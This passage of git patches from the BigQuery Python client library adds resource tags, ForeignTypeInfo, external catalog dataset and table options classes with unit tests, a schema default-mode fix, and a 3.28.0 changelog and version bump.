self.assertEqual(ds4.resource_tags, {}) # If we try to update using d2 again, it will fail because the # previous update changed the ETag. diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index cd336b73f..14089b031 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2028,6 +2028,7 @@ def test_update_dataset(self): LABELS = {"priority": "high"} ACCESS = [{"role": "OWNER", "userByEmail": "phred@example.com"}] EXP = 17 + RESOURCE_TAGS = {"123456789012/key": "value"} RESOURCE = { "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, "etag": "etag", @@ -2037,6 +2038,7 @@ def test_update_dataset(self): "defaultTableExpirationMs": EXP, "labels": LABELS, "access": ACCESS, + "resourceTags": RESOURCE_TAGS, } creds = _make_credentials() client = self._make_one(project=self.PROJECT, credentials=creds) @@ -2048,12 +2050,14 @@ def test_update_dataset(self): ds.default_table_expiration_ms = EXP ds.labels = LABELS ds.access_entries = [AccessEntry("OWNER", "userByEmail", "phred@example.com")] + ds.resource_tags = RESOURCE_TAGS fields = [ "description", "friendly_name", "location", "labels", "access_entries", + "resource_tags", ] with mock.patch( @@ -2077,6 +2081,7 @@ def test_update_dataset(self): "location": LOCATION, "labels": LABELS, "access": ACCESS, + "resourceTags": RESOURCE_TAGS, }, path="/" + PATH, timeout=7.5, @@ -2086,6 +2091,7 @@ def test_update_dataset(self): self.assertEqual(ds2.location, ds.location) self.assertEqual(ds2.labels, ds.labels) self.assertEqual(ds2.access_entries, ds.access_entries) + self.assertEqual(ds2.resource_tags, ds.resource_tags) # ETag becomes If-Match header. ds._properties["etag"] = "etag" diff --git a/tests/unit/test_create_dataset.py b/tests/unit/test_create_dataset.py index a2491a812..bd7c6a8f8 100644 --- a/tests/unit/test_create_dataset.py +++ b/tests/unit/test_create_dataset.py @@ -65,6 +65,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): "tableId": "northern-hemisphere", } DEFAULT_ROUNDING_MODE = "ROUND_HALF_EVEN" + RESOURCE_TAGS = {"123456789012/foo": "bar"} RESOURCE = { "datasetReference": {"projectId": PROJECT, "datasetId": DS_ID}, "etag": "etag", @@ -76,6 +77,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): "labels": LABELS, "access": [{"role": "OWNER", "userByEmail": USER_EMAIL}, {"view": VIEW}], "defaultRoundingMode": DEFAULT_ROUNDING_MODE, + "resourceTags": RESOURCE_TAGS, } conn = client._connection = make_connection(RESOURCE) entries = [ @@ -91,6 +93,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): before.default_table_expiration_ms = 3600 before.location = LOCATION before.labels = LABELS + before.resource_tags = RESOURCE_TAGS before.default_rounding_mode = DEFAULT_ROUNDING_MODE after = client.create_dataset(before) assert after.dataset_id == DS_ID @@ -103,6 +106,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): assert after.default_table_expiration_ms == 3600 assert after.labels == LABELS assert after.default_rounding_mode == DEFAULT_ROUNDING_MODE + assert after.resource_tags == RESOURCE_TAGS conn.api_request.assert_called_once_with( method="POST", @@ -119,6 +123,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): {"view": VIEW, "role": None}, ], "labels": LABELS, + "resourceTags": RESOURCE_TAGS, }, timeout=DEFAULT_TIMEOUT, ) diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index c0164bc73..46bcd6611 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -894,6 +894,28 @@ def test_location_setter(self): dataset.location = "LOCATION" self.assertEqual(dataset.location, "LOCATION") + def test_resource_tags_update_in_place(self): + dataset = self._make_one(self.DS_REF) + tags = dataset.resource_tags + tags["123456789012/foo"] = "bar" # update in place + self.assertEqual(dataset.resource_tags, {"123456789012/foo": "bar"}) + + def test_resource_tags_setter(self): + dataset = self._make_one(self.DS_REF) + dataset.resource_tags = {"123456789012/foo": "bar"} + self.assertEqual(dataset.resource_tags, {"123456789012/foo": "bar"}) + + def test_resource_tags_setter_bad_value(self): + dataset = self._make_one(self.DS_REF) + with self.assertRaises(ValueError): + dataset.resource_tags = "invalid" + with self.assertRaises(ValueError): + dataset.resource_tags = 123 + + def test_resource_tags_getter_missing_value(self): + dataset = self._make_one(self.DS_REF) + self.assertEqual(dataset.resource_tags, {}) + def test_labels_update_in_place(self): dataset = self._make_one(self.DS_REF) del dataset._properties["labels"] # don't start w/ existing dict From 55ca63c23fcb56573e2de67e4f7899939628c4a1 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 14 Jan 2025 23:14:02 -0500 Subject: [PATCH 051/202] feat: Adds ForeignTypeInfo class and tests (#2110) * Adds ForeignTypeInfo class and tests * Tweak to docstring * minor adjustment in test to enhance code coverage * Updates spacing in docstrings * More updates to spacing in docstrings. --- google/cloud/bigquery/schema.py | 64 ++++++++++++++++++++++++++++- tests/unit/test_schema.py | 71 ++++++++++++++++++++++++++++++++- 2 files changed, 131 insertions(+), 4 deletions(-) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 8d62b2b5b..b278b686a 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -560,6 +560,63 @@ def to_api_repr(self) -> dict: return answer +class ForeignTypeInfo: + """Metadata about the foreign data type definition such as the system in which the + type is defined. + + Args: + type_system (str): Required. Specifies the system which defines the + foreign data type. + + TypeSystem enum currently includes: + * "TYPE_SYSTEM_UNSPECIFIED" + * "HIVE" + """ + + def __init__(self, type_system: Optional[str] = None): + self._properties: Dict[str, Any] = {} + self.type_system = type_system + + @property + def type_system(self) -> Optional[str]: + """Required. Specifies the system which defines the foreign data + type.""" + + return self._properties.get("typeSystem") + + @type_system.setter + def type_system(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["typeSystem"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: Dict[str, Any]) -> "ForeignTypeInfo": + """Factory: constructs an instance of the class (cls) + given its API representation. + + Args: + api_repr (Dict[str, Any]): + API representation of the object to be instantiated. + + Returns: + An instance of the class initialized with data from 'api_repr'. + """ + + config = cls() + config._properties = api_repr + return config + + class SerDeInfo: """Serializer and deserializer information. @@ -625,6 +682,7 @@ def parameters(self, value: Optional[dict[str, str]] = None): def to_api_repr(self) -> dict: """Build an API representation of this object. + Returns: Dict[str, Any]: A dictionary in the format used by the BigQuery API. @@ -635,11 +693,13 @@ def to_api_repr(self) -> dict: def from_api_repr(cls, api_repr: dict) -> SerDeInfo: """Factory: constructs an instance of the class (cls) given its API representation. + Args: - resource (Dict[str, Any]): + api_repr (Dict[str, Any]): API representation of the object to be instantiated. + Returns: - An instance of the class initialized with data from 'resource'. + An instance of the class initialized with data from 'api_repr'. """ config = cls("PLACEHOLDER") config._properties = api_repr diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 7e84dd63f..efbc5d26f 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -1128,6 +1128,73 @@ def test_to_api_repr_parameterized(field, api): assert SchemaField(**field).to_api_repr() == api +class TestForeignTypeInfo: + """Tests for ForeignTypeInfo objects.""" + + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.schema import ForeignTypeInfo + + return ForeignTypeInfo + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + @pytest.mark.parametrize( + "type_system,expected", + [ + (None, None), + ("TYPE_SYSTEM_UNSPECIFIED", "TYPE_SYSTEM_UNSPECIFIED"), + ("HIVE", "HIVE"), + ], + ) + def test_ctor_valid_input(self, type_system, expected): + result = self._make_one(type_system=type_system) + + assert result.type_system == expected + + def test_ctor_invalid_input(self): + with pytest.raises(TypeError) as e: + self._make_one(type_system=123) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + @pytest.mark.parametrize( + "type_system,expected", + [ + ("TYPE_SYSTEM_UNSPECIFIED", {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"}), + ("HIVE", {"typeSystem": "HIVE"}), + (None, {"typeSystem": None}), + ], + ) + def test_to_api_repr(self, type_system, expected): + result = self._make_one(type_system=type_system) + + assert result.to_api_repr() == expected + + def test_from_api_repr(self): + """GIVEN an api representation of a ForeignTypeInfo object (i.e. api_repr) + WHEN converted into a ForeignTypeInfo object using from_api_repr() + THEN it will have the same representation in dict format as a ForeignTypeInfo + object made directly (via _make_one()) and represented in dict format. + """ + api_repr = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + + expected = self._make_one( + type_system="TYPE_SYSTEM_UNSPECIFIED", + ) + + klass = self._get_target_class() + result = klass.from_api_repr(api_repr) + + # We convert both to dict format because these classes do not have a + # __eq__() method to facilitate direct equality comparisons. + assert result.to_api_repr() == expected.to_api_repr() + + class TestSerDeInfo: """Tests for the SerDeInfo class.""" @@ -1190,9 +1257,9 @@ def test_to_api_repr(self): assert serde_info.to_api_repr() == expected_repr def test_from_api_repr(self): - """GIVEN an api representation of a SerDeInfo object (i.e. resource) + """GIVEN an api representation of a SerDeInfo object (i.e. api_repr) WHEN converted into a SerDeInfo object using from_api_repr() - THEN it will have the representation in dict format as a SerDeInfo + THEN it will have the same representation in dict format as a SerDeInfo object made directly (via _make_one()) and represented in dict format. """ api_repr = { From b929a900d49e2c15897134209ed9de5fc7f238cd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 15 Jan 2025 12:44:27 -0500 Subject: [PATCH 052/202] feat: adds ExternalCatalogDatasetOptions and tests (#2111) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: adds ExternalCatalogDatasetOptions and tests * Update google/cloud/bigquery/dataset.py Co-authored-by: Tim SweΓ±a (Swast) * Update google/cloud/bigquery/dataset.py Co-authored-by: Tim SweΓ±a (Swast) * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Tim SweΓ±a (Swast) Co-authored-by: Owl Bot --- google/cloud/bigquery/dataset.py | 25 +++++++ google/cloud/bigquery/external_config.py | 76 +++++++++++++++++++- tests/unit/test_dataset.py | 84 ++++++++++++++++++++++ tests/unit/test_external_config.py | 89 ++++++++++++++++++++++++ 4 files changed, 273 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index 4d06d729d..15a11fb40 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -27,6 +27,7 @@ from google.cloud.bigquery.routine import Routine, RoutineReference from google.cloud.bigquery.table import Table, TableReference from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration +from google.cloud.bigquery import external_config from typing import Optional, List, Dict, Any, Union @@ -531,6 +532,7 @@ class Dataset(object): "max_time_travel_hours": "maxTimeTravelHours", "default_rounding_mode": "defaultRoundingMode", "resource_tags": "resourceTags", + "external_catalog_dataset_options": "externalCatalogDatasetOptions", } def __init__(self, dataset_ref) -> None: @@ -898,6 +900,29 @@ def storage_billing_model(self, value): ) self._properties["storageBillingModel"] = value + @property + def external_catalog_dataset_options(self): + """Options defining open source compatible datasets living in the + BigQuery catalog. Contains metadata of open source database, schema + or namespace represented by the current dataset.""" + + prop = _helpers._get_sub_prop( + self._properties, ["externalCatalogDatasetOptions"] + ) + + if prop is not None: + prop = external_config.ExternalCatalogDatasetOptions.from_api_repr(prop) + return prop + + @external_catalog_dataset_options.setter + def external_catalog_dataset_options(self, value): + value = _helpers._isinstance_or_raise( + value, external_config.ExternalCatalogDatasetOptions, none_allowed=True + ) + self._properties[ + self._PROPERTY_TO_API_FIELD["external_catalog_dataset_options"] + ] = (value.to_api_repr() if value is not None else None) + @classmethod def from_string(cls, full_dataset_id: str) -> "Dataset": """Construct a dataset from fully-qualified dataset ID. diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index a891bc232..7f2b58f2b 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -18,7 +18,7 @@ Job.configuration.query.tableDefinitions. """ -from __future__ import absolute_import +from __future__ import absolute_import, annotations import base64 import copy @@ -28,6 +28,7 @@ from google.cloud.bigquery._helpers import _bytes_to_json from google.cloud.bigquery._helpers import _int_or_none from google.cloud.bigquery._helpers import _str_or_none +from google.cloud.bigquery import _helpers from google.cloud.bigquery.format_options import AvroOptions, ParquetOptions from google.cloud.bigquery.schema import SchemaField @@ -1003,3 +1004,76 @@ def from_api_repr(cls, resource: dict) -> "ExternalConfig": config = cls(resource["sourceFormat"]) config._properties = copy.deepcopy(resource) return config + + +class ExternalCatalogDatasetOptions: + """Options defining open source compatible datasets living in the BigQuery catalog. + Contains metadata of open source database, schema or namespace represented + by the current dataset. + + Args: + default_storage_location_uri (Optional[str]): The storage location URI for all + tables in the dataset. Equivalent to hive metastore's database + locationUri. Maximum length of 1024 characters. (str) + parameters (Optional[dict[str, Any]]): A map of key value pairs defining the parameters + and properties of the open source schema. Maximum size of 2Mib. + """ + + def __init__( + self, + default_storage_location_uri: Optional[str] = None, + parameters: Optional[Dict[str, Any]] = None, + ): + self._properties: Dict[str, Any] = {} + self.default_storage_location_uri = default_storage_location_uri + self.parameters = parameters + + @property + def default_storage_location_uri(self) -> Optional[str]: + """Optional. The storage location URI for all tables in the dataset. + Equivalent to hive metastore's database locationUri. Maximum length of + 1024 characters.""" + + return self._properties.get("defaultStorageLocationUri") + + @default_storage_location_uri.setter + def default_storage_location_uri(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["defaultStorageLocationUri"] = value + + @property + def parameters(self) -> Optional[Dict[str, Any]]: + """Optional. A map of key value pairs defining the parameters and + properties of the open source schema. Maximum size of 2Mib.""" + + return self._properties.get("parameters") + + @parameters.setter + def parameters(self, value: Optional[Dict[str, Any]]): + value = _helpers._isinstance_or_raise(value, dict, none_allowed=True) + self._properties["parameters"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: dict) -> ExternalCatalogDatasetOptions: + """Factory: constructs an instance of the class (cls) + given its API representation. + + Args: + api_repr (Dict[str, Any]): + API representation of the object to be instantiated. + + Returns: + An instance of the class initialized with data from 'resource'. + """ + config = cls() + config._properties = api_repr + return config diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 46bcd6611..8ab8dffec 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -650,6 +650,16 @@ class TestDataset(unittest.TestCase): DS_ID = "dataset-id" DS_REF = DatasetReference(PROJECT, DS_ID) KMS_KEY_NAME = "projects/1/locations/us/keyRings/1/cryptoKeys/1" + DEFAULT_STORAGE_LOCATION_URI = "gs://test-bucket/test-path" + PARAMETERS = {"key": "value"} + API_REPR = { + "datasetReference": {"projectId": "project", "datasetId": "dataset-id"}, + "labels": {}, + "externalCatalogDatasetOptions": { + "defaultStorageLocationUri": DEFAULT_STORAGE_LOCATION_URI, + "parameters": PARAMETERS, + }, + } @staticmethod def _get_target_class(): @@ -1067,6 +1077,80 @@ def test___repr__(self): expected = "Dataset(DatasetReference('project1', 'dataset1'))" self.assertEqual(repr(dataset), expected) + def test_external_catalog_dataset_options_setter(self): + # GIVEN the parameters DEFAULT_STORAGE_LOCATION_URI and PARAMETERS + # WHEN an ExternalCatalogDatasetOptions obj is created + # and added to a dataset. + # THEN the api representation of the dataset will match API_REPR + + from google.cloud.bigquery.external_config import ExternalCatalogDatasetOptions + + dataset = self._make_one(self.DS_REF) + + ecdo_obj = ExternalCatalogDatasetOptions( + default_storage_location_uri=self.DEFAULT_STORAGE_LOCATION_URI, + parameters=self.PARAMETERS, + ) + dataset.external_catalog_dataset_options = ecdo_obj + + result = dataset.to_api_repr() + expected = self.API_REPR + assert result == expected + + def test_external_catalog_dataset_options_getter_prop_exists(self): + # GIVEN default dataset PLUS an ExternalCatalogDatasetOptions + # THEN confirm that the api_repr of the ExternalCatalogDatasetsOptions + # matches the api_repr of the external_catalog_dataset_options attribute. + + from google.cloud.bigquery.external_config import ExternalCatalogDatasetOptions + + dataset = self._make_one(self.DS_REF) + ecdo_obj = ExternalCatalogDatasetOptions( + default_storage_location_uri=self.DEFAULT_STORAGE_LOCATION_URI, + parameters=self.PARAMETERS, + ) + dataset.external_catalog_dataset_options = ecdo_obj + result = dataset.external_catalog_dataset_options.to_api_repr() + expected = ecdo_obj.to_api_repr() + assert result == expected + + def test_external_catalog_dataset_options_getter_prop_is_none(self): + # GIVEN only a default dataset + # THEN confirm that external_catalog_dataset_options is None + + dataset = self._make_one(self.DS_REF) + expected = None + result = dataset.external_catalog_dataset_options + assert result == expected + + def test_external_catalog_dataset_options_from_api_repr(self): + # GIVEN default dataset including an ExternalCatalogDatasetOptions + # THEN confirm that the api_repr of the ExternalCatalogDatasetsOptions + # on a dataset object created via from_api_repr matches the api_repr + # of the "externalCatalogDatasetOptions" key. + + api_repr = self.API_REPR + klass = self._get_target_class() + dataset = klass.from_api_repr(api_repr) + + result = dataset.external_catalog_dataset_options.to_api_repr() + expected = api_repr["externalCatalogDatasetOptions"] + assert result == expected + + def test_external_catalog_dataset_options_to_api_repr(self): + # GIVEN a dataset api_repr including an ExternalCatalogDatasetOptions key + # THEN confirm that the api_repr of that key from a dataset object created + # via the to_api_repr() method matches the value of the key + # used to create the dataset object + + api_repr = self.API_REPR + klass = self._get_target_class() + dataset = klass.from_api_repr(api_repr) + + result = dataset.to_api_repr()["externalCatalogDatasetOptions"] + expected = api_repr["externalCatalogDatasetOptions"] + assert result == expected + class TestDatasetListItem(unittest.TestCase): @staticmethod diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 9fd16e699..0c27d8e56 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -19,6 +19,8 @@ from google.cloud.bigquery import external_config from google.cloud.bigquery import schema +import pytest + class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] @@ -890,3 +892,90 @@ def _copy_and_update(d, u): d = copy.deepcopy(d) d.update(u) return d + + +class TestExternalCatalogDatasetOptions: + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.external_config import ExternalCatalogDatasetOptions + + return ExternalCatalogDatasetOptions + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + DEFAULT_STORAGE_LOCATION_URI = "gs://test-bucket/test-path" + PARAMETERS = {"key": "value"} + + @pytest.mark.parametrize( + "default_storage_location_uri,parameters", + [ + (DEFAULT_STORAGE_LOCATION_URI, PARAMETERS), # set all params + (DEFAULT_STORAGE_LOCATION_URI, None), # set only one argument at a time + (None, PARAMETERS), + (None, None), # use default parameters + ], + ) + def test_ctor_initialization( + self, + default_storage_location_uri, + parameters, + ): + """Test ExternalCatalogDatasetOptions constructor with explicit values.""" + + instance = self._make_one( + default_storage_location_uri=default_storage_location_uri, + parameters=parameters, + ) + + assert instance.default_storage_location_uri == default_storage_location_uri + assert instance.parameters == parameters + + @pytest.mark.parametrize( + "default_storage_location_uri,parameters", + [ + (123, None), # does not accept integers + (None, 123), + ], + ) + def test_ctor_invalid_input(self, default_storage_location_uri, parameters): + """Test ExternalCatalogDatasetOptions constructor with invalid input.""" + + with pytest.raises(TypeError) as e: + self._make_one( + default_storage_location_uri=default_storage_location_uri, + parameters=parameters, + ) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + """Test ExternalCatalogDatasetOptions.to_api_repr method.""" + + instance = self._make_one( + default_storage_location_uri=self.DEFAULT_STORAGE_LOCATION_URI, + parameters=self.PARAMETERS, + ) + resource = instance.to_api_repr() + assert ( + resource["defaultStorageLocationUri"] == self.DEFAULT_STORAGE_LOCATION_URI + ) + assert resource["parameters"] == self.PARAMETERS + + def test_from_api_repr(self): + """GIVEN an api representation of an ExternalCatalogDatasetOptions object (i.e. api_repr) + WHEN converted into an ExternalCatalogDatasetOptions object using from_api_repr() + THEN it will have the representation in dict format as an ExternalCatalogDatasetOptions + object made directly (via _make_one()) and represented in dict format. + """ + + instance = self._make_one() + api_repr = { + "defaultStorageLocationUri": self.DEFAULT_STORAGE_LOCATION_URI, + "parameters": self.PARAMETERS, + } + result = instance.from_api_repr(api_repr) + + assert isinstance(result, external_config.ExternalCatalogDatasetOptions) + assert result._properties == api_repr From 9c504186f03ffb8b86836c683912b310db2435e9 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Wed, 15 Jan 2025 10:22:48 -0800 Subject: [PATCH 053/202] chore(main): release 3.28.0 (#2056) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 28 ++++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 989b7f020..6a7ff5641 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,34 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.28.0](https://github.com/googleapis/python-bigquery/compare/v3.27.0...v3.28.0) (2025-01-15) + + +### Features + +* Add property for `allowNonIncrementalDefinition` for materialized view ([#2084](https://github.com/googleapis/python-bigquery/issues/2084)) ([3359ef3](https://github.com/googleapis/python-bigquery/commit/3359ef37b90243bea2d9e68bb996fe5d736f304c)) +* Add property for maxStaleness in table definitions ([#2087](https://github.com/googleapis/python-bigquery/issues/2087)) ([729322c](https://github.com/googleapis/python-bigquery/commit/729322c2288a30464f2f135ba18b9c4aa7d2f0da)) +* Add type hints to Client ([#2044](https://github.com/googleapis/python-bigquery/issues/2044)) ([40529de](https://github.com/googleapis/python-bigquery/commit/40529de923e25c41c6728c121b9c82a042967ada)) +* Adds ExternalCatalogDatasetOptions and tests ([#2111](https://github.com/googleapis/python-bigquery/issues/2111)) ([b929a90](https://github.com/googleapis/python-bigquery/commit/b929a900d49e2c15897134209ed9de5fc7f238cd)) +* Adds ForeignTypeInfo class and tests ([#2110](https://github.com/googleapis/python-bigquery/issues/2110)) ([55ca63c](https://github.com/googleapis/python-bigquery/commit/55ca63c23fcb56573e2de67e4f7899939628c4a1)) +* Adds new input validation function similar to isinstance. ([#2107](https://github.com/googleapis/python-bigquery/issues/2107)) ([a2bebb9](https://github.com/googleapis/python-bigquery/commit/a2bebb95c5ef32ac7c7cbe19c3e7a9412cbee60d)) +* Adds StorageDescriptor and tests ([#2109](https://github.com/googleapis/python-bigquery/issues/2109)) ([6be0272](https://github.com/googleapis/python-bigquery/commit/6be0272ff25dac97a38ae4ee5aa02016dc82a0d8)) +* Adds the SerDeInfo class and tests ([#2108](https://github.com/googleapis/python-bigquery/issues/2108)) ([62960f2](https://github.com/googleapis/python-bigquery/commit/62960f255d05b15940a8d2cdc595592175fada11)) +* Migrate to pyproject.toml ([#2041](https://github.com/googleapis/python-bigquery/issues/2041)) ([1061611](https://github.com/googleapis/python-bigquery/commit/106161180ead01aca1ead909cf06ca559f68666d)) +* Preserve unknown fields from the REST API representation in `SchemaField` ([#2097](https://github.com/googleapis/python-bigquery/issues/2097)) ([aaf1eb8](https://github.com/googleapis/python-bigquery/commit/aaf1eb85ada95ab866be0199812ea7f5c7f50766)) +* Resource tags in dataset ([#2090](https://github.com/googleapis/python-bigquery/issues/2090)) ([3e13016](https://github.com/googleapis/python-bigquery/commit/3e130166f43dcc06704fe90edf9068dfd44842a6)) +* Support setting max_stream_count when fetching query result ([#2051](https://github.com/googleapis/python-bigquery/issues/2051)) ([d461297](https://github.com/googleapis/python-bigquery/commit/d4612979b812d2a835e47200f27a87a66bcb856a)) + + +### Bug Fixes + +* Allow geopandas 1.x ([#2065](https://github.com/googleapis/python-bigquery/issues/2065)) ([f2ab8cb](https://github.com/googleapis/python-bigquery/commit/f2ab8cbfe00d442ad3b40683ecfec320e53b4688)) + + +### Documentation + +* Render fields correctly for update calls ([#2055](https://github.com/googleapis/python-bigquery/issues/2055)) ([a4d9534](https://github.com/googleapis/python-bigquery/commit/a4d9534a900f13ae7355904cda05097d781f27e3)) + ## [3.27.0](https://github.com/googleapis/python-bigquery/compare/v3.26.0...v3.27.0) (2024-11-01) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 8f4418777..7da2c534f 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.27.0" +__version__ = "3.28.0" From 7de6822e1c556a68cb8d50e90664c094697cca1d Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Fri, 17 Jan 2025 10:24:06 -0800 Subject: [PATCH 054/202] fix: add default value in SchemaField.from_api_repr() (#2115) --- google/cloud/bigquery/schema.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index b278b686a..42dfbfca8 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -228,6 +228,12 @@ def from_api_repr(cls, api_repr: dict) -> "SchemaField": # fields. See https://github.com/googleapis/python-bigquery/issues/6 placeholder._properties = api_repr + # Add the field `mode` with default value if it does not exist. Fixes + # an incompatibility issue with pandas-gbq: + # https://github.com/googleapis/python-bigquery-pandas/issues/854 + if "mode" not in placeholder._properties: + placeholder._properties["mode"] = "NULLABLE" + return placeholder @property From cdc1a6e1623b8305c6a6a1a481b3365e866a073d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 21 Jan 2025 06:04:34 -0500 Subject: [PATCH 055/202] feat: add ExternalCatalogTableOptions class and tests (#2116) * Updates most of external_catalog_table_options * Adds ExternalCatalogTableOptions and tests --- google/cloud/bigquery/external_config.py | 107 ++++++++++++++++++ google/cloud/bigquery/magics/magics.py | 2 +- google/cloud/bigquery/table.py | 35 ++++++ tests/unit/test_external_config.py | 137 +++++++++++++++++++++++ tests/unit/test_table.py | 87 ++++++++++++++ 5 files changed, 367 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 7f2b58f2b..73c4acabf 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -30,6 +30,7 @@ from google.cloud.bigquery._helpers import _str_or_none from google.cloud.bigquery import _helpers from google.cloud.bigquery.format_options import AvroOptions, ParquetOptions +from google.cloud.bigquery import schema from google.cloud.bigquery.schema import SchemaField @@ -1077,3 +1078,109 @@ def from_api_repr(cls, api_repr: dict) -> ExternalCatalogDatasetOptions: config = cls() config._properties = api_repr return config + + +class ExternalCatalogTableOptions: + """Metadata about open source compatible table. The fields contained in these + options correspond to hive metastore's table level properties. + + Args: + connection_id (Optional[str]): The connection specifying the credentials to be + used to read external storage, such as Azure Blob, Cloud Storage, or + S3. The connection is needed to read the open source table from + BigQuery Engine. The connection_id can have the form `..` or + `projects//locations//connections/`. + parameters (Union[Dict[str, Any], None]): A map of key value pairs defining the parameters + and properties of the open source table. Corresponds with hive meta + store table parameters. Maximum size of 4Mib. + storage_descriptor (Optional[StorageDescriptor]): A storage descriptor containing information + about the physical storage of this table. + """ + + def __init__( + self, + connection_id: Optional[str] = None, + parameters: Union[Dict[str, Any], None] = None, + storage_descriptor: Optional[schema.StorageDescriptor] = None, + ): + self._properties: Dict[str, Any] = {} + self.connection_id = connection_id + self.parameters = parameters + self.storage_descriptor = storage_descriptor + + @property + def connection_id(self) -> Optional[str]: + """Optional. The connection specifying the credentials to be + used to read external storage, such as Azure Blob, Cloud Storage, or + S3. The connection is needed to read the open source table from + BigQuery Engine. The connection_id can have the form `..` or + `projects//locations//connections/`. + """ + + return self._properties.get("connectionId") + + @connection_id.setter + def connection_id(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["connectionId"] = value + + @property + def parameters(self) -> Union[Dict[str, Any], None]: + """Optional. A map of key value pairs defining the parameters and + properties of the open source table. Corresponds with hive meta + store table parameters. Maximum size of 4Mib. + """ + + return self._properties.get("parameters") + + @parameters.setter + def parameters(self, value: Union[Dict[str, Any], None]): + value = _helpers._isinstance_or_raise(value, dict, none_allowed=True) + self._properties["parameters"] = value + + @property + def storage_descriptor(self) -> Any: + """Optional. A storage descriptor containing information about the + physical storage of this table.""" + + prop = _helpers._get_sub_prop(self._properties, ["storageDescriptor"]) + + if prop is not None: + return schema.StorageDescriptor.from_api_repr(prop) + return None + + @storage_descriptor.setter + def storage_descriptor(self, value: Union[schema.StorageDescriptor, dict, None]): + value = _helpers._isinstance_or_raise( + value, (schema.StorageDescriptor, dict), none_allowed=True + ) + if isinstance(value, schema.StorageDescriptor): + self._properties["storageDescriptor"] = value.to_api_repr() + else: + self._properties["storageDescriptor"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: dict) -> ExternalCatalogTableOptions: + """Factory: constructs an instance of the class (cls) + given its API representation. + + Args: + api_repr (Dict[str, Any]): + API representation of the object to be instantiated. + + Returns: + An instance of the class initialized with data from 'api_repr'. + """ + config = cls() + config._properties = api_repr + return config diff --git a/google/cloud/bigquery/magics/magics.py b/google/cloud/bigquery/magics/magics.py index b153d959a..a5be95185 100644 --- 